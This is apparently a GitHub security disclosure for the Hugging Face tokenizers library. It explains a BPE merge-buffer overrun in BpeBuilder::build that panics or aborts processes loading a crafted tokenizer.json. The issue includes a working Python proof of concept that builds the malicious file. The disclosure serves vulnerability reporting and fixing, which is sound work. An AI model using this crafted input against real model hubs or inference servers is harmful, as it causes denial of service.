Skip to content

[Security] Load-time process abort when loading a malicious tokenizer.json (BPE merge buffer overrun) #2094

@geo-chen

Description

@geo-chen

Summary

Loading an untrusted tokenizer.json panics the BPE model builder and, in Rust and FFI embeddings, aborts the entire process. The builder sizes a scratch buffer to the longest vocabulary key, then writes the concatenation of each merge rule into it. A merge whose concatenated token is longer than any vocabulary key overruns the buffer, which Rust turns into a panic. Every Hugging Face model ships a tokenizer.json and they are downloaded and shared, so loading one is a common, deliberate action.

Details

In tokenizers/src/models/bpe/model.rs, BpeBuilder::build:

let mut buffer: Vec<u8> = vec![0; max_len];          // line 251: max_len = byte length of the LONGEST vocab key
...
buffer[0..a.len()].copy_from_slice(a.as_bytes());    // line 264
let b_len = b.len() - prefix_len;
let merge_len = a.len() + b_len;
buffer[a.len()..merge_len].copy_from_slice(&b.as_bytes()[prefix_len..]); // line 267: panics when merge_len > max_len

buffer is sized to max_len, the longest vocab key. For each merge rule (a, b) the code writes the concatenation a + b[prefix_len..], of length merge_len = a.len() + b.len() - prefix_len, into that buffer. When the concatenated merge token is longer than any vocab key, the slice index is out of bounds and Rust panics. The code already has a graceful error path for out-of-vocabulary merge tokens (Error::MergeTokenOutOfVocabulary, exercised by the test test_bpe_from_file_merge_token_oov), but the buffer write happens before that check, so this case aborts instead of returning the intended error. A secondary defect at the same site: with continuing_subword_prefix set and a merge whose b.len() < prefix_len, b_len underflows (usize), which panics in debug and corrupts merge_len in release.

Sink path: Tokenizer.from_file / from_str deserializes the BPE model (bpe/serialization.rs), calls BpeBuilder::vocab_and_merges, then build, reaching line 267. This is pure load time, no encoding needed. No existing advisory describes the max_len buffer overrun.

PoC

pip install tokenizers
python poc_bpe_panic.py

poc_bpe_panic.py:

import os, json
from tokenizers import Tokenizer
# vocab's longest key is length 2 ("aa","bb"); merge ["aa","bb"] -> "aabb" (len 4) > max_len (2),
# overrunning the merge buffer at bpe/model.rs:267 during LOAD.
malicious = {
    "version": "1.0", "truncation": None, "padding": None,
    "added_tokens": [], "normalizer": None, "pre_tokenizer": None,
    "post_processor": None, "decoder": None,
    "model": {
        "type": "BPE", "dropout": None, "unk_token": None,
        "continuing_subword_prefix": None, "end_of_word_suffix": None,
        "fuse_unk": False, "byte_fallback": False, "ignore_merges": False,
        "vocab": {"aa": 0, "bb": 1},
        "merges": [["aa", "bb"]],
    },
}
p = os.path.expanduser("~/poc_tokenizer.json")
open(p, "w").write(json.dumps(malicious))
Tokenizer.from_file(p)   # panics: range end index 4 out of range for slice of length 2

Observed (tokenizers 0.23.1): thread '<unnamed>' panicked at .../bpe/model.rs:267:23: range end index 4 out of range for slice of length 2, surfacing in the Python binding as pyo3_runtime.PanicException (exit 1), instantly from a tiny input.

Impact

A trivially crafted tokenizer.json causes a denial of service when loaded. In the Python binding the panic surfaces as a catchable exception, but in pure-Rust consumers and FFI embeddings of the tokenizers crate (where panics are not unwound, or panic = "abort" is set, common in release builds) it aborts the entire process. Any service that loads model-supplied tokenizer files (model hubs, inference servers, automated model loaders) is exposed.

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Type

    No type
    No fields configured for issues without a type.

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions